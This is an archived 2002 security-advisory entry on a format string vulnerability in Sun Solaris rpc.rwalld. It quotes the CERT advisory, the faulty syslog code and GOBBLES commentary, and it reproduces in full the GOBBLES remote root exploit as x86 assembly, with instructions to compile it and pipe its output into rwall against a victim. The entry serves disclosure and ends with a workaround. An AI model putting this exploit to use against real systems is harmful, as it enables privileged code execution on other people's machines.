26th Sep 2002 [SBWID-5319]
COMMAND
Sun rpc.rwalld format string vulnerability
SYSTEMS AFFECTED
Sun Solaris 2.5.1, 2.6, 7, and 8
PROBLEM
From CERT [http://www.cert.org/] advisory CA-2002-10:
-snapp-
rpc.rwalld is a utility that listens for remote wall requests. Wall is
used to send a message to all terminals of a time-sharing system. If
the wall command cannot be executed, the rwall daemon will display an
error message.
An intruder can consume system resources and potentially prevent wall
from executing, which would trigger the rwall daemon's error message.
A format string vulnerability exists in the code that displays the
error message. This vulnerability may permit the intruder to execute
code with the privileges of the rwall daemon.
This vulnerability may be exploited both locally and remotely,
although remote exploitation is significantly more difficult.
-snipp-
GOBBLES Security advisory #32, which originally reported the bug, quotes
the faulty code and adds the following commentary:
	/*
	 * Make sure the wall program exists, is executable, and runs
	 */
	if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||
	    (fp = popen(WALL_PROG, "w")) == NULL) {
		syslog(LOG_NOTICE,
		    "rwall message received but could not execute %s",
		    WALL_PROG);
		syslog(LOG_NOTICE, msg);	/* msg is the remote client's text, used as the format string */
Bug easy enough to spot, but now question is, "GOBBLES, friend, how is
this to be exploited? Faulty syslog() only called if rpc.rwalld can not
execute /usr/sbin/wall on local system, which mean it only exploitable
if admin have chmod -x or rm /usr/sbin/wall or something like this,
right, so why this so such a big deal?"
To this GOBBLES say, "Friend IDIOT, faulty syslog() is called if
anything is to make popen() fail, there one other way to exploit bug,
which make it dangerous and affect all installation of Solaris running
rpc.rwalld, is that popen() to fail if there no available file
descriptors on system."
This easier to exploit locally on system. For remote exploitation,
timing is important and thus is race condition. Each new tcp session to
running service on target host will consume filedescriptor.
And the "not so exploitable" exploit:
/*
Remote Root Exploit for Solaris 6-8 rpc.walld
Usage Instructions:
1. Compile.
gcc -o xwall xwall.s
2. Run.
(./xwall ; ./shellcode) | rwall victim
3. Late Easter egg.
strings xwall
Note(s):
Something else must be done to consume FD's on
victim system. Figure this one out for self.
This exploit written to be run on Linux. Supplied
format string is for Sparc Solaris. Provide own
remote shellcode and use as above described.
Love,
GOBBLES Security
http://www.bugtraq.org
[email protected]
*/
retloc:
.long 0x41424344
retaddr:
.long 0x60bb135
padding:
.long 4
walkcount:
.long 1
.globl main
.type main,@function
main:
pusha
movl (padding),%ecx
jusfhds7fg:
pushl %ecx
movl $4,%eax
movl $1,%ebx
pushl $0x00000041
movl %esp,%ecx
movl $1,%edx
int $0x80
popl %ecx
popl %ecx
loop jusfhds7fg
movl %esp,24(%esp)
pushl $0x42424242
movl $4,%edx
movl %esp,%ecx
movl $1,%ebx
movl $4,%eax
int $0x80
movl (retloc),%eax
bswapl %eax
pushl %eax
subl $4,%ecx
movl %edx,%eax
int $0x80
addl $4,%ecx
movl %edx,%eax
int $0x80
subl $4,%ecx
popl %eax
bswapl %eax
incl %eax
incl %eax
bswapl %eax
pushl %eax
movl %edx,%eax
int $0x80
popl %eax
movl %esp,%edx
incl %edx
xorl %esi,101(%ebp)
andb %al,111(%edx)
popa
pushl %edx
andb %al,97(%ebx)
decl %esi
aaa
andb %al,111(%ebx)
incl %esp
xorl (%ecx),%eax
movl (walkcount),%ecx
cmpl $0,%ecx
je nczxhczjcg89zg89
pushl %ecx
movl $4,%edx
movl $1,%ebx
pushl $0x78382e25
cmzxnczxcz8c:
pushl %ecx
movl %esp,%ecx
addl $4,%ecx
movl $4,%eax
int $0x80
popl %ecx
loop cmzxnczxcz8c
popl %ecx
popl %ecx
nczxhczjcg89zg89:
movl (retaddr),%edx
pushl %edx
shr $16,%edx
subl %edx,(%esp)
movw $0,2(%esp)
pushl %edx
shll $3,%ecx
subl %ecx,(%esp)
movl (padding),%edx
subl %edx,(%esp)
subl $16,(%esp)
movw $0,2(%esp)
pushl $cznxczxczxh8
call printf
movl $1,%eax
int $0x80
cznxczxczxh8:
.string "%%%uc%%hn%%%uc%%hn\n"
SOLUTION
Disabling rpc.rwalld in inetd.conf is the recommended workaround until
patches are available.